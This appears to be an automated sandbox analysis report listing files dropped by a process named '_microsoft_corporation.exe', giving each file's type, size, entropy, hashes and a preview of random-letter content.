                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.700014595314478
                                                          Encrypted:false
                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                          Malicious:false
                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.6994061563025005
                                                          Encrypted:false
                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                          Malicious:false
                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):402
                                                          Entropy (8bit):3.493087299556618
                                                          Encrypted:false
                                                          SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                          MD5:ECF88F261853FE08D58E2E903220DA14
                                                          SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                          SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                          SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.702896917219035
                                                          Encrypted:false
                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                          Malicious:false
                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694985340190863
                                                          Encrypted:false
                                                          SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                          MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                          SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                          SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                          SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                          Malicious:false
                                                          Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694982189683734
                                                          Encrypted:false
                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                          Malicious:false
                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.696250160603532
                                                          Encrypted:false
                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                          Malicious:false
                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
